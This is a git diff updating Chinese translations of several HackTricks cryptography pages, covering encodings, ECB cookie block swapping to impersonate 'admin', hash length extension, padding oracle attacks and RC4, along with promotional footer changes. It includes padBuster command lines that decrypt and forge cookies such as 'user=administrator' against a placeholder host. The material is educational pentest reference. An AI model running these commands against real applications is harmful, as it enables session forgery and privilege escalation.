.-.. -.-. .- .-. .- -.-. --- .-.. .- ``` -* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) +* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 页面不存在: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) -### UUencoder - -* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 死链: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) +### UU编码器 ``` begin 644 webutils_pl M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%( @@ -157,7 +156,7 @@ end ``` * [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu) -### XXEncoder +### XX编码器 ``` begin 644 webutils_pl hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236 @@ -168,9 +167,7 @@ end ### YEncoder -* [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx) - -### YEncoder +### Y编码 ``` =ybegin line=128 size=28 name=webutils_pl ryvkryvkryvkryvkryvkryvkryvk @@ -235,7 +232,7 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA ## 压缩 -**原始压缩** 和 **原始解压**(您可以在 Cyberchef 中找到)可以在没有标头的情况下压缩和解压数据。 +**原始压缩** 和 **原始解压**(你可以在 Cyberchef 中找到)可以压缩和解压数据而不带头部信息。 ## 简单加密 @@ -263,7 +260,7 @@ wodsyoidrods ### Fernet -2个base64字符串(令牌和密钥) +2个base64字符串(token和key) ``` Token: gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q== @@ -273,7 +270,7 @@ Key: ``` * [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode) -### Samir 秘密分享 +### Samir 秘密共享 一个秘密被分成 X 部分,要恢复它,你需要 Y 部分(_Y <=X_)。 ``` @@ -294,16 +291,17 @@ Key: * [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) * [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster) +{% hint style="success" %} +学习并练习AWS黑客技术:[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP黑客技术:[**HackTricks培训GCP红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE (HackTricks AWS Red Team Expert)! +支持HackTricks -支持HackTricks的其他方式: - -* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**上关注**我们。 -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
+{% endhint %} diff --git a/cryptography/electronic-code-book-ecb.md b/cryptography/electronic-code-book-ecb.md index bf9c8a830..c77386d87 100644 --- a/cryptography/electronic-code-book-ecb.md +++ b/cryptography/electronic-code-book-ecb.md @@ -1,36 +1,37 @@ +{% hint style="success" %} +学习并练习AWS黑客技术:[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP黑客技术:[**HackTricks培训GCP红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持HackTricks -支持HackTricks的其他方式: - -* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
+{% endhint %} # ECB -(ECB) 电子密码本 - 对称加密方案,**将明文的每个块**替换为**密文块**。这是**最简单**的加密方案。其主要思想是将明文分割成**N位的块**(取决于输入数据块的大小、加密算法),然后使用唯一密钥加密(解密)每个明文块。 +(ECB) 电子密码本 - 对称加密方案,**用密文块替换明文块**。这是**最简单**的加密方案。其主要思想是将明文分割成**N位的块**(取决于输入数据块的大小、加密算法),然后使用唯一密钥加密(解密)每个明文块。 ![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png) -使用ECB存在多个安全问题: +使用ECB存在多个安全隐患: * **加密消息中的块可以被移除** * **加密消息中的块可以被移动** # 漏洞的检测 -想象一下,您多次登录一个应用程序,**总是得到相同的cookie**。这是因为应用程序的cookie是**`<用户名>|<密码>`**。\ -然后,您创建两个新用户,两者都具有**相同的长密码**和**几乎相同的用户名**。\ -您发现**两个用户信息的8字节块**是**相同的**。然后,您想象这可能是因为正在使用**ECB**。 +想象一下,你多次登录一个应用程序,**总是得到相同的cookie**。这是因为应用程序的cookie是**`<用户名>|<密码>`**。\ +然后,你创建两个新用户,两者都有**相同的长密码**和**几乎相同的用户名**。\ +你发现**两个用户信息**的**8字节块**是**相同的**。然后,你想到这可能是因为正在使用**ECB**。 -就像以下示例中一样。观察这**两个解码的cookie**中多次出现的块**`\x23U\xE45K\xCB\x21\xC8`**。 +就像在以下示例中一样。观察这**两个解码的cookie**中多次出现的块**`\x23U\xE45K\xCB\x21\xC8`** ``` \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 @@ -38,7 +39,7 @@ ``` 这是因为这些 cookie 的**用户名和密码中包含多次字母"a"**(例如)。**不同的区块**是包含**至少 1 个不同字符**的区块(也许是分隔符"|"或用户名中的某些必要差异)。 -现在,攻击者只需发现格式是`<用户名><分隔符><密码>`还是`<密码><分隔符><用户名>`。为了做到这一点,他只需**生成几个相似且较长的用户名和密码**,直到找到格式和分隔符的长度: +现在,攻击者只需发现格式是`<用户名><分隔符><密码>`还是`<密码><分隔符><用户名>`。为了做到这一点,他只需**生成多个相似且较长的用户名和密码**,直到找到格式和分隔符的长度: | 用户名长度: | 密码长度: | 用户名+密码长度: | 解码后的 Cookie 长度: | | ------------ | ---------- | ---------------- | ----------------------- | @@ -57,7 +58,7 @@ \x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` 我们可以看到先前使用只包含`a`的用户名创建的模式`\x23U\xE45K\xCB\x21\xC8`。\ -然后,您可以移除前8B块,就可以得到用户名为`admin`的有效cookie: +然后,您可以移除第一个8B块,您将得到一个针对用户名`admin`的有效cookie: ``` \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` @@ -67,13 +68,13 @@ 因此,另一种冒充用户`admin`的方法是: -- 生成一个用户名:`len() + len(`将生成2个8B块。 +- 生成一个用户名:`len() + len(`将生成2个8B块。 - 然后,生成一个密码,填充包含我们想要冒充的用户名和空格的确切块数,例如:`admin `。 该用户的cookie将由3个块组成:前两个是用户名+分隔符的块,第三个是密码的块(伪装成用户名):`username |admin `。 **然后,只需用最后一个块替换第一个块,就可以冒充用户`admin`:`admin |username`** -# 参考 +## 参考 * [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\)) diff --git a/cryptography/hash-length-extension-attack.md b/cryptography/hash-length-extension-attack.md index fae03c65c..d72d636e9 100644 --- a/cryptography/hash-length-extension-attack.md +++ b/cryptography/hash-length-extension-attack.md @@ -1,42 +1,43 @@ +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} # 攻击摘要 -想象一个服务器通过**将一个** **秘密** **附加**到一些已知的明文数据上,然后对该数据进行哈希来**签署**一些**数据**。如果您知道: +想象一个服务器正在通过将一个**秘密**附加到一些已知明文数据上然后对该数据进行哈希来**签署**一些**数据**。如果你知道: -* **秘密的长度**(这也可以从给定长度范围内进行暴力破解) +* **秘密的长度**(这也可以从给定长度范围内暴力破解) * **明文数据** * **算法(及其容易受到此攻击)** * **填充是已知的** -* 通常会使用默认填充,因此如果满足其他3个要求,这也是可以的 +* 通常会使用默认填充,因此如果满足其他 3 个要求,这也是可以的 * 填充取决于秘密+数据的长度,这就是为什么需要秘密的长度 -那么,攻击者可以**附加** **数据**并为**先前数据+附加数据**生成有效的**签名**。 +那么,对于**攻击者**来说,就有可能**附加数据**并为**先前数据+附加数据**生成有效的**签名**。 -## 如何实现? +## 如何? -基本上,易受攻击的算法首先通过**哈希一个数据块**生成哈希,然后,**从**先前创建的**哈希**(状态)开始,它们**添加下一个数据块**并**对其进行哈希**。 +基本上,易受攻击的算法首先通过**哈希一个数据块**生成哈希,然后,从**先前**创建的**哈希**(状态)开始,它们**添加下一个数据块**并**对其进行哈希**。 -然后,想象秘密是"secret",数据是"data","secretdata"的MD5是6036708eba0d11f6ef52ad44e8b74d5b。\ +然后,想象秘密是"secret",数据是"data","secretdata"的 MD5 是 6036708eba0d11f6ef52ad44e8b74d5b。\ 如果攻击者想要附加字符串"append",他可以: -* 生成64个"A"的MD5 -* 将先前初始化的哈希状态更改为6036708eba0d11f6ef52ad44e8b74d5b +* 生成 64 个"A"的 MD5 +* 将先前初始化的哈希状态更改为 6036708eba0d11f6ef52ad44e8b74d5b * 附加字符串"append" -* 完成哈希,生成的哈希将是**对"secret" + "data" + "填充" + "append"**的有效哈希 +* 完成哈希,生成的哈希将是一个**对于"secret" + "data" + "填充" + "append"**有效的哈希 ## **工具** @@ -44,19 +45,20 @@ ## 参考资料 -您可以在[https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)中找到对这种攻击的很好解释 +你可以在 [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) 中找到对这种攻击的很好解释。 +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/cryptography/padding-oracle-priv.md b/cryptography/padding-oracle-priv.md index bd52206ab..27966c379 100644 --- a/cryptography/padding-oracle-priv.md +++ b/cryptography/padding-oracle-priv.md @@ -1,69 +1,70 @@ +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} # CBC - 密码块链接 -在CBC模式中,**前一个加密块被用作IV**与下一个块进行XOR运算: +在 CBC 模式中,**前一个加密块被用作 IV** 与下一个块进行异或运算: -![CBC加密](https://defuse.ca/images/cbc\_encryption.png) +![https://defuse.ca/images/cbc\_encryption.png](https://defuse.ca/images/cbc\_encryption.png) -要解密CBC,需要执行**相反的操作**: +要解密 CBC,需要执行**相反的操作**: -![CBC解密](https://defuse.ca/images/cbc\_decryption.png) +![https://defuse.ca/images/cbc\_decryption.png](https://defuse.ca/images/cbc\_decryption.png) -请注意需要使用**加密密钥**和**IV**。 +请注意,需要使用一个**加密密钥**和一个**IV**。 # 消息填充 由于加密是以**固定大小的块**进行的,通常需要在**最后一个块**中进行填充以完成其长度。\ -通常使用**PKCS7**,它生成一个填充,重复**所需的字节数**以**完成**该块。例如,如果最后一个块缺少3个字节,填充将是`\x03\x03\x03`。 +通常使用 **PKCS7**,它生成一个填充,**重复**所需的**字节数**以**完成**块。例如,如果最后一个块缺少 3 个字节,填充将是 `\x03\x03\x03`。 -让我们看看一个**长度为8字节的2个块**的更多示例: +让我们看看一个**长度为 8 字节的 2 个块**的更多示例: -| 字节 #0 | 字节 #1 | 字节 #2 | 字节 #3 | 字节 #4 | 字节 #5 | 字节 #6 | 字节 #7 | 字节 #0 | 字节 #1 | 字节 #2 | 字节 #3 | 字节 #4 | 字节 #5 | 字节 #6 | 字节 #7 | +| byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | | ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | | P | A | S | S | W | O | R | D | 1 | 2 | 3 | 4 | 5 | 6 | **0x02** | **0x02** | | P | A | S | S | W | O | R | D | 1 | 2 | 3 | 4 | 5 | **0x03** | **0x03** | **0x03** | | P | A | S | S | W | O | R | D | 1 | 2 | 3 | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** | | P | A | S | S | W | O | R | D | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | -请注意,在最后一个示例中,**最后一个块已满,因此另一个仅包含填充的块被生成**。 +请注意,在最后一个示例中,**最后一个块已满,因此另一个仅带填充的块被生成**。 -# 填充Oracle +# 填充 Oracle -当应用程序解密加密数据时,它将首先解密数据;然后将删除填充。在清除填充时,如果**无效的填充触发可检测的行为**,则存在**填充Oracle漏洞**。可检测的行为可以是**错误**、**缺少结果**或**响应速度变慢**。 +当应用程序解密加密数据时,它将首先解密数据;然后将删除填充。在清除填充时,如果**无效的填充触发可检测的行为**,则存在**填充 Oracle 漏洞**。可检测的行为可以是一个**错误**,**缺少结果**或**响应较慢**。 如果检测到这种行为,您可以**解密加密数据**甚至**加密任何明文**。 ## 如何利用 -您可以使用[https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster)来利用这种漏洞,或者只需执行 +您可以使用 [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) 来利用这种漏洞,或者只需执行 ``` sudo apt-get install padbuster ``` -为了测试网站的 cookie 是否存在漏洞,您可以尝试: +为了测试一个网站的 cookie 是否存在漏洞,你可以尝试: ```bash perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" ``` **编码 0** 意味着使用 **base64**(但其他选项也可用,请查看帮助菜单)。 -您还可以**滥用此漏洞来加密新数据。例如,假设 cookie 的内容是 "**_**user=MyUsername**_**",然后您可以将其更改为 "\_user=administrator\_" 并在应用程序内提升权限。您也可以使用 `paduster` 指定 `-plaintext**` 参数来执行此操作: +您还可以**滥用此漏洞来加密新数据。例如,假设 cookie 的内容是 "**_**user=MyUsername**_**",然后您可以将其更改为 "\_user=administrator\_" 并在应用程序内提升权限。您也可以使用 `paduster` 并指定 `-plaintext** 参数来执行此操作: ```bash perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator" ``` -如果网站存在漏洞,`padbuster`将自动尝试在出现填充错误时找到漏洞,但您也可以使用**-error**参数指定错误消息。 +如果网站存在漏洞,`padbuster`将在出现填充错误时自动尝试查找,但您也可以使用**-error**参数指定错误消息。 ```bash perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding" ``` @@ -75,7 +76,7 @@ perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon 假设您有一些加密文本,占据了由**E0到E15**字节组成的**2个块**。\ 为了解密**最后一个**块(**E8**到**E15**),整个块通过“块密码解密”生成**中间字节I0到I15**。\ -最后,每个中间字节都与先前的加密字节(E0到E7)进行**XOR运算**。因此: +最后,每个中间字节都与先前加密的字节(E0到E7)进行**XOR运算**。因此: * `C15 = D(E15) ^ E7 = I15 ^ E7` * `C14 = I14 ^ E6` @@ -89,7 +90,7 @@ perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon 这使我们能够**计算C15**:`C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7` -知道**C15**,现在可以**计算C14**,但这次要用` \x02\x02`来暴力破解填充。 +知道**C15**,现在可以**计算C14**,但这次是通过暴力破解填充`\x02\x02`。 这个BF与前一个一样复杂,因为可以计算出值为0x02的`E''15`:`E''7 = \x02 ^ I15`,所以只需要找到生成**`C14`等于`0x02`**的**`E'14`**。\ 然后,执行相同的步骤来解密C14:**`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`** @@ -99,26 +100,11 @@ perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon ## 漏洞检测 注册一个帐户并使用该帐户登录。\ -如果您**多次登录**并始终获得**相同的cookie**,则应用程序可能存在**问题**。每次登录时发送回的**cookie应该是唯一的**。如果cookie**始终**是**相同的**,它可能始终有效,**无法使其失效**。 +如果您**多次登录**并始终获得**相同的cookie**,则应用程序可能存在**问题**。每次登录时发送回的cookie应该是**唯一的**。如果cookie**始终**是**相同的**,那么它可能始终有效,**无法使其失效**。 现在,如果您尝试**修改**cookie,您会看到应用程序返回一个**错误**。\ -但是,如果您使用填充预言(例如使用padbuster)进行BF,您可以获得另一个适用于不同用户的有效cookie。这种情况很可能容易受到padbuster的攻击。 +但是,如果您使用填充预言(例如使用padbuster)进行BF,您将成功获得另一个适用于不同用户的有效cookie。这种情况很可能对padbuster易受攻击。 -# 参考资料 +## 参考 * [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation) - - -
- -从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert) - -支持HackTricks的其他方式: - -* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 发现[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**上关注**我们。 -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 - -
diff --git a/cryptography/rc4-encrypt-and-decrypt.md b/cryptography/rc4-encrypt-and-decrypt.md index 7199a054e..0ec6e5d38 100644 --- a/cryptography/rc4-encrypt-and-decrypt.md +++ b/cryptography/rc4-encrypt-and-decrypt.md @@ -1,22 +1,42 @@ +{% hint style="success" %} +学习并练习AWS黑客:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP黑客:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} -如果您可以使用RC4加密明文,只需使用加密函数即可解密由该RC4加密的任何内容(使用相同的密码)。 +如果你能以某种方式使用RC4加密明文,那么你可以仅使用加密函数解密由该RC4加密的任何内容(使用相同的密码)。 -如果您可以加密已知明文,还可以提取密码。更多参考资料可以在HTB Kryptos机器中找到: +如果你能加密一个已知的明文,你也可以提取密码。更多参考资料可以在HTB Kryptos机器中找到: {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} + + + + + +{% hint style="success" %} +学习并练习AWS黑客:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP黑客:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +支持 HackTricks + +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。 + +
+{% endhint %} diff --git a/emails-vulns.md b/emails-vulns.md index 63957cfc2..8629db1ae 100644 --- a/emails-vulns.md +++ b/emails-vulns.md @@ -1,29 +1,20 @@ # 电子邮件漏洞 +{% hint style="success" %} +学习并练习 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
